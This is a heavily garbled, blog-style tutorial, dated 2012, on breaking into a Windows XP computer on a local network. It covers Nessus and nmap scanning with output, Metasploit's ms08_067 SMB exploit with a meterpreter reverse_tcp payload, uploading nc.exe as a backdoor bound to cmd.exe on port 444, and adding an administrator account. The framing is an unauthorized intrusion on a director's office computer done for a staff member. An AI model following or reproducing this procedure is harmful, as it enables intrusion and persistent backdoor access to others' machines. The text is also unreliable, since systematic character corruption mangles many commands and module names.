Backdor Nectcat With Smb OS2C jogja (30/1-2012/02:29P !

- good morning, a right now we will exploit a computer system the victim with IP address 172.18.10.4. we and victim e local area networ! on e"ual. #here Ip attac!er 172.18.10.$ and other computer up with ip 172.18.10.1. so there we have % unit computer to &'(. #he ensuing structur s!enario networ! )

#he *cenario attac!er used methode is hac!er or attac!er a delegate stat+, while attac!er recived order +orm sta+ to the add user acount on computer director with level as administrators acount director. In order to stat+ can acsess computer director, upon o++ice onely a stat+ can using login to computer director. ,!e the next, author egin techni"ue how to add user to computer director with used explot sm . (ow attac!er need tool aplication to get in+ormation a victim-computer director.. #here we used nessus to +ind and search port, services and vulner ility application on computer, possi le can to hole as do attac!er exploit computer target. #he elow we can see we application nessus.

the next we add ip target as o /ect scan to !now and +ind service and port open are hole exploit computer target. #o +orm the elow must input in+ormation name target, type -run now. and policy with choose i"ter"a# "et$ork %ca".

'+ter we seting ip target next cli! utton scan #a&"ch %ca" now proses scanning running, we waiting ouput scan in+ormation a out computer victim.

(ow in+ormation port, service and protocol to computer target we get. #he next we can !now continue a out description a out all service. (ow we choose protocol tcp with port 1%0 is server message protocol to show in+o detail, the e"ual is picture screenshoot in+ormation sm .

nmap 4' 172.18.10.4 1e can get in+ormation used other scan li!es scanner via console is (2'P, the use *tarting (map $.51#6*#4 - http)77nmap.org . at 20124014%0 di++rent nmap and nessus a operation searching and +inding open port and servcie 07)1$ '3# with via console. 3or example using nmap ) (map scan report +or 172.18.10.4 8ost is up -0.0010s latency.. (ot shown) 007 closed ports P,9# *#'#6 *69:I;6 :69*I,( 1%$7tcp open msrpc 2icroso+t 1indows 9P; 1%07tcp open net ios4ssn 44$7tcp open microso+t4ds 2icroso+t 1indows <P microso+t4 ds 2'; 'ddress) 08)00)27)04)14)%4 -;admus ;omputer *ystems. =evice type) general purpose 9unning) 2icroso+t 1indows <P ,* ;P6) cpe)7o)microso+t)windows>xp ,* details) 2icroso+t 1indows <P *P2 or *P% (etwor! =istance) 1 hop *ervice In+o) ,*) 1indows? ;P6) cpe)7o)microso+t)windows 8ost script results) @>n stat) (etAI,* name) BI#(6#402, (etAI,* user) Cun!nownD, (etAI,* 2';) 08)00)27)04)14)%4 -;admus ;omputer *ystems. @ sm 4security4mode) @ 'ccount that was used +or sm scripts) guest @ Eser4level authentication @ *2A *ecurity) ;hallenge7response passwords supported @> 2essage signing disa led -dangerous, ut de+ault. @>sm v24ena led) *erver doesnFt support *2Av2 protocol @ sm 4os4discovery) @ ,*) 1indows <P -1indows 2000 &'( 2anager. @ ;omputer name) !itnet402 @ (etAI,* computer name) BI#(6#402 @ 1or!group) 1,9BG9,EP @> *ystem time) 20124014%0 07)1$)25 E#;48 #9';69,E#6 8,P 9## '==96** 1 1.0$ ms 172.18.10.4 ,* and *ervice detection per+ormed. Please report any incorrect results at http)77nmap.org7su mit7 .

(ear also we can see !ind in+omation uses nessus to nmap, ut with nmap dont have description, plugin, pid and solution. (ow will exploit computer target )

' ove picture is metaspolit, here attac!er uses exploit +ramewor!% on the ac!trac! 4 r2. #he next we use exploit sm . 1e user exploit server mail loc! protocol-sm . with !ind exploit e'(#oit/$i"do$%/%mb/m%0)*0+,*"eta(i- 'nd next we applying payloads to sm using payload meterpreter, $i"do$%/meter(reter/re.erce*tc( and and we insert host target and host attac!er. 1hile %et /0OS1 is input to host target and %et 20OS1 input to host attac!er.

'nd we have ac!dor will send acdor to computer target.

'+ter we include host target and host attac!er and !now located +ile send computer target, +urthermore we do exploit.

ac!dor to

(ow computer direcotor or target wass exploit, through meterperter we can do upload and download +ile to located computer target. 's image upon we can show techni"ue upload +ile ac!dor to +ile system%2 windows. Epon we type commad

e'(#oit computer attac!er was sucsess on system%2 computer target. 'nd now attac!er running +ile ac!dor nc.exe to command line computer target.

Proses listening to port 444 while running. ;ommand "c-e'e 3#.( 444 3e cmd-e'e mind +ile ac!dor run Hl is listening to Hp port 444, to port here attac!er used port 444. Esing port up to attac!er can used port, 000,888, or $$$. 'nd command Hv ac!dor runing mode ver ose -use twice to e more ver ose..

(ow this is mission add user to computer target, atttac!er add name user to computer targer wiht new user stat+ password) passtat+. 'nd we can see new user wass add to computer.

#he next attac!er same level access etwen acount director and stat+. 's picture elow we can show succses ma!e start level administrators.

'nd the last computer start trying running nc through he computer, to sure !now he has have acoutn to computer director. #9'='(Gggg..... success complete the mission a attac!er on the /o s.